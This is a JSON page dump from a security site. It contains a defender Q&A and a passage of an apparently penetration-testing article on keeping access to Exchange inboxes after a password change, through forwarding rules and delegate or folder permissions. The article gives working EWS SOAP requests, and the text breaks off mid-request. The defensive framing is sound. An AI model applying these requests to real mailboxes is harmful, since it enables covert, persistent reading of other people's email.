[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fnTMGRI1rdf_-RLlEQDJEA0rpLOyk-vLqhk7RBjaM9RU":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},440,"How can defenders detect and prevent an attacker from maintaining persistent access to user email boxes?","Defenders should regularly audit inbox rules (Get-InboxRule) and folder permissions (Get-MailboxFolderPermission) for each mailbox. After a password change, administrators should also reset any forwarding rules or delegate permissions that may have been set by the attacker. Additionally, monitoring for unusual SOAP\u002FEWS activity, such as excessive UpdateInboxRules or AddDelegate calls, can indicate compromise. The article emphasizes that changing the password alone does not revoke previously granted permissions or rules. For comprehensive defense strategies, refer to the full [Penetration Basics - Methods to Continuously Obtain Exchange User Inbox Emails](\u002Fnews\u002Fpenetration-basics-methods-to-continuously-obtain-exchange-user-inbox-emails) article.","\u003Cp>Defenders should regularly audit inbox rules (Get-InboxRule) and folder permissions (Get-MailboxFolderPermission) for each mailbox. After a password change, administrators should also reset any forwarding rules or delegate permissions that may have been set by the attacker. Additionally, monitoring for unusual SOAP\u002FEWS activity, such as excessive UpdateInboxRules or AddDelegate calls, can indicate compromise. The article emphasizes that changing the password alone does not revoke previously granted permissions or rules. For comprehensive defense strategies, refer to the full [Penetration Basics - Methods to Continuously Obtain Exchange User Inbox Emails](\u002Fnews\u002Fpenetration-basics-methods-to-continuously-obtain-exchange-user-inbox-emails) article.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-basics-methods-to-continuously-obtain-exchange-user-inbox-emails\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-defenders-detect-and-prevent-an-attacker-from-maintaining-persistent-acc-1777483596068","defense, detection, auditing, Get-InboxRule, Get-MailboxFolderPermission, EWS monitoring, persistent access, email security",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},110,"Penetration Basics - Methods to Continuously Obtain Exchange User Inbox Emails","penetration-basics-methods-to-continuously-obtain-exchange-user-inbox-emails","Learn methods to persistently access Exchange user inbox emails via forwarding rules and permissions. Includes defense tips for securing email data after password leaks.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>When we obtain a user's password or hash, we can read that user's emails.\u003C\u002Fp>\u003Cp>If the user changes their password, can we continue to read that user's emails without knowing the new password?\u003C\u002Fp>\u003Cp>From a defensive perspective, when a mail user's password is leaked, what additional steps should we take after changing the password to ensure the security of email data?\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Method to continuously obtain Exchange user inbox emails by adding forwarding rules\u003C\u002Fli>\u003Cli>Method to continuously obtain Exchange user inbox emails by adding access permissions\u003C\u002Fli>\u003Cli>Method to continuously obtain Exchange user inbox emails by adding mail functions\u003C\u002Fli>\u003Cli>Method to continuously obtain Exchange user emails by adding user permissions\u003C\u002Fli>\u003Cli>Open-source code\u003C\u002Fli>\u003Cli>Defense and detection\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Method to Continuously Obtain Exchange User Inbox Emails by Adding Forwarding Rules\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Adding forwarding rules via ECP\u003C\u002Fh3>\u003Cp>Requires access to Exchange Control Panel (ECP)\u003C\u002Fp>\u003Cp>Log in as user test1, select organize email -&gt; inbox rules, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017267123_0_d8247b6d3a.jpeg\">\u003C\u002Fp>\u003Cp>Select Create a new rule for arriving messages...\u003C\u002Fp>\u003Cp>Set Name as the rule name, here set to Forwardtest\u003C\u002Fp>\u003Cp>Configure sequentially as [Apply to all messages], Forward the message to..., select target user test2, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017290564_1_abd8302824.jpeg\">\u003C\u002Fp>\u003Cp>At this point, the rule is successfully added\u003C\u002Fp>\u003Cp>Whenever user test1 receives an email, the email will also be sent to user test2's inbox\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If test1 deletes the email from the inbox, test2 is not affected\u003C\u002Fp>\u003Ch3>2. Implementation via SOAP XML message\u003C\u002Fh3>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fupdateinboxrules-operation\u003C\u002Fp>\u003Cp>Create and delete rules using UpdateInboxRules\u003C\u002Fp>\u003Cp>Format for creating a rule to forward emails to user test2:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updateinboxrules>\u003Cbr>      \u003Cm:removeoutlookruleblob>true\u003C\u002Fm:removeoutlookruleblob>\u003Cbr>      \u003Cm:operations>\u003Cbr>        \u003Ct:createruleoperation>\u003Cbr>          \u003Ct:rule>\u003Cbr>            \u003Ct:displayname>ForwardRule\u003C\u002Ft:displayname>\u003Cbr>            \u003Ct:priority>1\u003C\u002Ft:priority>\u003Cbr>            \u003Ct:isenabled>true\u003C\u002Ft:isenabled>\u003Cbr>            \u003Ct:conditions>\u003Cbr>            \u003Ct:exceptions>\u003Cbr>            \u003Ct:actions>\u003Cbr>              \u003Ct:forwardtorecipients>\u003Cbr>                \u003Ct:address>\u003Cbr>                  \u003Ct:emailaddress>test2@test.com\u003C\u002Ft:emailaddress>\u003Cbr>                \u003C\u002Ft:address>\u003Cbr>              \u003C\u002Ft:forwardtorecipients>\u003Cbr>            \u003C\u002Ft:actions>\u003Cbr>          \u003C\u002Ft:exceptions>\u003C\u002Ft:conditions>\u003C\u002Ft:rule>\u003Cbr>        \u003C\u002Ft:createruleoperation>\u003Cbr>      \u003C\u002Fm:operations>\u003Cbr>    \u003C\u002Fm:updateinboxrules>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Reading rules uses GetInboxRules\u003C\u002Fp>\u003Cp>The format for reading rule information for user test1 is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:getinboxrules>\u003Cbr>      \u003Cm:mailboxsmtpaddress>test1@test.com\u003C\u002Fm:mailboxsmtpaddress>\u003Cbr>    \u003C\u002Fm:getinboxrules>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The RuleID corresponding to the rule can be obtained from the returned result.\u003C\u002Fp>\u003Cp>The format for deleting a specified rule is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updateinboxrules>\u003Cbr>      \u003Cm:removeoutlookruleblob>true\u003C\u002Fm:removeoutlookruleblob>\u003Cbr>        \u003Cm:operations>\u003Cbr>          \u003Ct:deleteruleoperation>\u003Cbr>            \u003Ct:ruleid>AQAAAAAADPg\u003C\u002Ft:ruleid>\u003Cbr>          \u003C\u002Ft:deleteruleoperation>\u003Cbr>        \u003C\u002Fm:operations>\u003Cbr>    \u003C\u002Fm:updateinboxrules>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>AQAAAAAADPg is the RuleId, which can be obtained via GetInboxRules\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The latter part of this article will introduce the complete implementation code\u003C\u002Fp>\u003Ch2>0x03 Method to Add Access Permissions for Persistent Access to Exchange User Inbox Emails\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Supports inbox, does not support outbox\u003C\u002Fp>\u003Ch3>1. Add inbox access permissions via OWA\u003C\u002Fh3>\u003Cp>Requires access to Outlook Web Access (OWA)\u003C\u002Fp>\u003Cp>Log in as user test1, select Inbox -&gt; permissions..., as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017321998_2_0f92ae2b10.jpeg\">\u003C\u002Fp>\u003Cp>Add user test2 with edit permissions\u003C\u002Fp>\u003Cul>\u003Cli>Read: Full details\u003C\u002Fli>\u003Cli>Write: Edit all\u003C\u002Fli>\u003Cli>Delete access: None\u003C\u002Fli>\u003Cli>Other: Folder visible\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Alternatively, directly set the Permission level to Editor, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770017371093_3_88aca0cc5b.jpeg\">\u003C\u002Fp>\u003Cp>At this point, permission setup is complete\u003C\u002Fp>\u003Cp>Log in as user test2, select add shared folder..., enter username test1 to obtain access to user test1's inbox\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>If test1 deletes emails from the inbox, test2 cannot read the deleted emails\u003C\u002Fp>\u003Ch3>2. Implement via SOAP XML message\u003C\u002Fh3>\u003Cp>Add access permissions using AddDelegate or UpdateFolder\u003C\u002Fp>\u003Ch4>1. AddDelegate\u003C\u002Fh4>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fadddelegate-operation\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>AddDelegate supports the following folders:\u003C\u002Fp>\u003Cul>\u003Cli>CalendarFolderPermissionLevel\u003C\u002Fli>\u003Cli>TasksFolderPermissionLevel\u003C\u002Fli>\u003Cli>InboxFolderPermissionLevel\u003C\u002Fli>\u003Cli>ContactsFolderPermissionLevel\u003C\u002Fli>\u003Cli>NotesFolderPermissionLevel\u003C\u002Fli>\u003Cli>JournalFolderPermissionLevel\u003C\u002Fli>\u003C\u002Ful>\u003Cp>To view the access permissions for user test1's inbox, use the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:getdelegate includepermissions=\"true\">\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>    \u003C\u002Fm:getdelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Grant user test2 full access permissions to user test1's inbox, in the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:adddelegate>\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>      \u003Cm:delegateusers>\u003Cbr>      \u003Ct:delegateuser>\u003Cbr>        \u003Ct:userid>\u003Cbr>          \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>        \u003C\u002Ft:userid>\u003Cbr>        \u003Ct:delegatepermissions>\u003Cbr>          \u003Ct:inboxfolderpermissionlevel>Editor\u003C\u002Ft:inboxfolderpermissionlevel>\u003Cbr>        \u003C\u002Ft:delegatepermissions>\u003Cbr>        \u003Ct:receivecopiesofmeetingmessages>false\u003C\u002Ft:receivecopiesofmeetingmessages>\u003Cbr>        \u003Ct:viewprivateitems>false\u003C\u002Ft:viewprivateitems>\u003Cbr>      \u003C\u002Ft:delegateuser>\u003Cbr>    \u003C\u002Fm:delegateusers>\u003Cbr>      \u003Cm:delivermeetingrequests>DelegatesAndMe\u003C\u002Fm:delivermeetingrequests>\u003Cbr>    \u003C\u002Fm:adddelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Modify access permissions using UpdateDelegate\u003C\u002Fp>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fupdatedelegate-operation\u003C\u002Fp>\u003Cp>Set full access permissions for user test2 to user test1's inbox, format as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updatedelegate>\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>      \u003Cm:delegateusers>\u003Cbr>      \u003Ct:delegateuser>\u003Cbr>        \u003Ct:userid>\u003Cbr>          \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>        \u003C\u002Ft:userid>\u003Cbr>        \u003Ct:delegatepermissions>\u003Cbr>          \u003Ct:inboxfolderpermissionlevel>Editor\u003C\u002Ft:inboxfolderpermissionlevel>\u003Cbr>        \u003C\u002Ft:delegatepermissions>\u003Cbr>        \u003Ct:receivecopiesofmeetingmessages>false\u003C\u002Ft:receivecopiesofmeetingmessages>\u003Cbr>        \u003Ct:viewprivateitems>true\u003C\u002Ft:viewprivateitems>\u003Cbr>      \u003C\u002Ft:delegateuser>\u003Cbr>    \u003C\u002Fm:delegateusers>\u003Cbr>      \u003Cm:delivermeetingrequests>DelegatesAndMe\u003C\u002Fm:delivermeetingrequests>\u003Cbr>    \u003C\u002Fm:updatedelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Remove access permissions using RemoveDelegate\u003C\u002Fp>\u003Cp>SOAP format reference:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fweb-service-reference\u002Fremovedelegate-operation\u003C\u002Fp>\u003Cp>Remove user test2's access permissions to user test1's inbox, format as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\">\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:removedelegate>\u003Cbr>      \u003Cm:mailbox>\u003Cbr>        \u003Ct:emailaddress>test1@test.com\u003C\u002Ft:emailaddress>\u003Cbr>      \u003C\u002Fm:mailbox>\u003Cbr>      \u003Cm:userids>\u003Cbr>        \u003Ct:userid>\u003Cbr>          \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>        \u003C\u002Ft:userid>\u003Cbr>    \u003C\u002Fm:userids>\u003Cbr>    \u003C\u002Fm:removedelegate>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2.UpdateFolder\u003C\u002Fh4>\u003Cp>References:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fexchange\u002Fclient-developer\u002Fexchange-web-services\u002Fhow-to-set-folder-permissions-for-another-user-by-using-ews-in-exchange\u003C\u002Fp>\u003Cp>Check the access permissions for user test1's inbox, formatted as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" \u003Cbr=\"\">               xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" \u003Cbr>               xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" \u003Cbr>               xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\"&gt;\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:getfolder>\u003Cbr>      \u003Cm:foldershape>\u003Cbr>        \u003Ct:baseshape>IdOnly\u003C\u002Ft:baseshape>\u003Cbr>        \u003Ct:additionalproperties>\u003Cbr>          \u003Ct:fielduri fielduri=\"folder:PermissionSet\">\u003Cbr>        \u003C\u002Ft:fielduri>\u003C\u002Ft:additionalproperties>\u003Cbr>      \u003C\u002Fm:foldershape>\u003Cbr>      \u003Cm:folderids>\u003Cbr>        \u003Ct:distinguishedfolderid id=\"inbox\">\u003Cbr>      \u003C\u002Ft:distinguishedfolderid>\u003C\u002Fm:folderids>\u003Cbr>    \u003C\u002Fm:getfolder>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Grant user test2 full access permission to user test1's inbox, formatted as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" \u003Cbr=\"\">               xmlns:m=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Fmessages\" \u003Cbr>               xmlns:t=\"http:\u002F\u002Fschemas.microsoft.com\u002Fexchange\u002Fservices\u002F2006\u002Ftypes\" \u003Cbr>               xmlns:soap=\"http:\u002F\u002Fschemas.xmlsoap.org\u002Fsoap\u002Fenvelope\u002F\"&gt;\u003Cbr>  \u003Csoap:header>\u003Cbr>    \u003Ct:requestserverversion version=\"Exchange2013_SP1\">\u003Cbr>  \u003C\u002Ft:requestserverversion>\u003C\u002Fsoap:header>\u003Cbr>  \u003Csoap:body>\u003Cbr>    \u003Cm:updatefolder>\u003Cbr>      \u003Cm:folderchanges>\u003Cbr>        \u003Ct:folderchange>\u003Cbr>          \u003Ct:folderid id=\"{id}\" changekey=\"{key}\">\u003Cbr>          \u003Ct:updates>\u003Cbr>            \u003Ct:setfolderfield>\u003Cbr>              \u003Ct:fielduri fielduri=\"folder:PermissionSet\">\u003Cbr>              \u003Ct:folder>\u003Cbr>                \u003Ct:permissionset>\u003Cbr>                  \u003Ct:permissions>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                      \u003Ct:userid>\u003Cbr>                        \u003Ct:distinguisheduser>Default\u003C\u002Ft:distinguisheduser>\u003Cbr>                      \u003C\u002Ft:userid>\u003Cbr>                      \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                      \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                      \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                      \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                      \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                      \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                      \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                      \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                      \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                    \u003Ct:userid>\u003Cbr>                      \u003Ct:distinguisheduser>Anonymous\u003C\u002Ft:distinguisheduser>\u003Cbr>                    \u003C\u002Ft:userid>\u003Cbr>                    \u003Ct:cancreateitems>false\u003C\u002Ft:cancreateitems>\u003Cbr>                    \u003Ct:cancreatesubfolders>false\u003C\u002Ft:cancreatesubfolders>\u003Cbr>                    \u003Ct:isfolderowner>false\u003C\u002Ft:isfolderowner>\u003Cbr>                    \u003Ct:isfoldervisible>false\u003C\u002Ft:isfoldervisible>\u003Cbr>                    \u003Ct:isfoldercontact>false\u003C\u002Ft:isfoldercontact>\u003Cbr>                    \u003Ct:edititems>None\u003C\u002Ft:edititems>\u003Cbr>                    \u003Ct:deleteitems>None\u003C\u002Ft:deleteitems>\u003Cbr>                    \u003Ct:readitems>None\u003C\u002Ft:readitems>\u003Cbr>                    \u003Ct:permissionlevel>None\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                    \u003Ct:permission>\u003Cbr>                      \u003Ct:userid>\u003Cbr>                        \u003Ct:primarysmtpaddress>test2@test.com\u003C\u002Ft:primarysmtpaddress>\u003Cbr>                      \u003C\u002Ft:userid>\u003Cbr>                      \u003Ct:permissionlevel>Editor\u003C\u002Ft:permissionlevel>\u003Cbr>                    \u003C\u002Ft:permission>\u003Cbr>\u003Cbr>                  \u003C\u002Ft:permissions>\u003Cbr>                \u003C\u002Ft:permissionset>\u003Cbr>              \u003C\u002Ft:folder>\u003Cbr>            \u003C\u002Ft:fielduri>\u003C\u002Ft:setfolderfield>\u003Cbr>          \u003C\u002Ft:updates>\u003Cbr>        \u003C\u002Ft:folderid>\u003C\u002Ft:folderchange>\u003Cbr>      \u003C\u002Fm:folderchanges>\u003Cbr>    \u003C\u002Fm:updatefolder>\u003Cbr>  \u003C\u002Fsoap:body>\u003Cbr>\u003C\u002Fsoap:envelope>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>It is important to note that the UpdateFolder operation will overwrite existing settings, so a delete operation is equivalent to restoring the permission configuration information.\u003C\u002Fp>\u003Cp>Remove user test2's access permissions to user test1's inbox, formatted as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>\u003C!--?xml version=\"1.0\" encoding=\"utf-8\"?-->\u003Cbr>\u003Csoap:envelope xmlns:xsi=\"http:\u002F\u002Fwww.w3.org\u002F2001\u002FXMLSchema-instance\" \u003Cbr=\"\">               